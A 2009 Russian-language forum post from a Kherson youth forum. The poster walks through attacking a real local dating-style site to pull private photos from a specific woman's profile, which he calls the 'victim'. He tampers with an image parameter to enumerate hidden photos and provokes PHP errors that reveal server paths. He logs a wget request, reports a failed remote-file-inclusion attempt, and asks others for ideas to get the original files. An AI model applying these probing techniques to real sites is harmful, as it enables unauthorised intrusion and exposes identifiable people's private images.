Форум Херсона. Форум Херсонской молодежи. - Показать сообщение отдельно

pingwinator · 08.08.2009, 19:15

Цитата:

Сообщение от ustas

честно, не интересно
интересней почитать как уводят у других

и ты правильно заметил что тут будет сплошной копипаст, т.к. никто не занимается ресерчем уязвимостей, что вполне логично и естественно

ну вот чтобы не было копипаста - возмём для експеримента сайт херсонгёрлз

цель - посмотреть личную инфу
для експеримента выбираем жертву http://www.khersongirls.com/php/detail.php?site=4698
для начала хотим получить фотки (на анкете их одна, на самом деле их больше)
такс -смотрим на ссылку на фотку

Код:

http://www.khersongirls.com/php/photo.php?subcatalog=20&photo_file=2534x4698x34719.jpeg&agent_domain=khersongirls.com

смотрим чё за аргументы
subcatalog=20 - папка с фоткой
photo_file=2534x4698x34719.jpeg - страное имя файла. как оказалась первое число - номер анкеты, второе - внутрений номер в базе (он же номер страницы), а вот 35303 - хм. как оказалось номер фотки с фотика. пробуем поменять - опа, пошли фотки. но надо как-то забрать оригинали а не то что отдаёт скрип
последнее agent_domain=khersongirls.com - подпись под фоткой

ладно - вернёмся к изменению фото_файл
ошиблись в значении - опа, ошибка в пхп скрипте

Код:

Warning:  getimagesize: Unable to open '/home/k/h/khersongirls.com/html//php/files/photos/20/2534x4698x3471.jpeg' for reading. in /home/k/h/khersongirls.com/html/php/photo.php on line 15

Warning: imagecreatefromjpeg: Unable to open '/home/k/h/khersongirls.com/html//php/files/photos/20/2534x4698x3471.jpeg' for reading in /home/k/h/khersongirls.com/html/php/photo.php on line 24

Warning:  Supplied argument is not a valid Image resource in /home/k/h/khersongirls.com/html/php/photo.php on line 31

Warning: Cannot add header information - headers already sent by (output started at /home/k/h/khersongirls.com/html/php/photo.php:15) in /home/k/h/khersongirls.com/html/php/photo.php on line 34

Warning:  Supplied argument is not a valid Image resource in /home/k/h/khersongirls.com/html/php/photo.php on line 38

подозрения свершились
значит

Код:

http://www.khersongirls.com/php/photo.php?subcatalog=20&photo_file=2534x4698x34719.jpeg&agent_domain=khersongirls.com

берёт файл с

Код:

khersongirls.com/php/files/photos/20/2534x4698x34719.jpeg

- а вот нет, как оказалась файлы там защищены и редирект

Код:

GET /php/files/photos/20/2534x4698x34719.jpeg HTTP/1.0
User-Agent: Wget/1.11.4
Accept: */*
Host: khersongirls.com
Connection: Keep-Alive

---request end---
Запрос HTTP послан, ожидание ответа... 
---response begin---
HTTP/1.1 302 Found
Date: Sat, 08 Aug 2009 17:16:20 GMT
Server: Apache/1.3.27 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.12 OpenSSL/0.9.6b PHP/4.1.2 FrontPage/5.0.2.2510
Location: http://www.khersongirls.com/index.htm
Connection: close
Content-Type: text/html; charset=iso-8859-1

---response end---
302 Found
Адрес: http://www.khersongirls.com/index.htm [переход]

вот покамись на этом остановился. у кого есть идеи как получить оригинал?

ПОВТОРЯЮ - ПРОФИЛЬ ЖЕРТВЫ ВЫБРАН В СЛУЧАЙНОМ ПОРЯДКЕ. ничего лично, это придено для примера

pingwinator добавил 08.08.2009 в 20:17
кстати, класический приём с

Цитата:

http://www.khersongirls.com/php/help...p://google.com

несработал :(
было бы весело если бы даные не инклудились с папки help/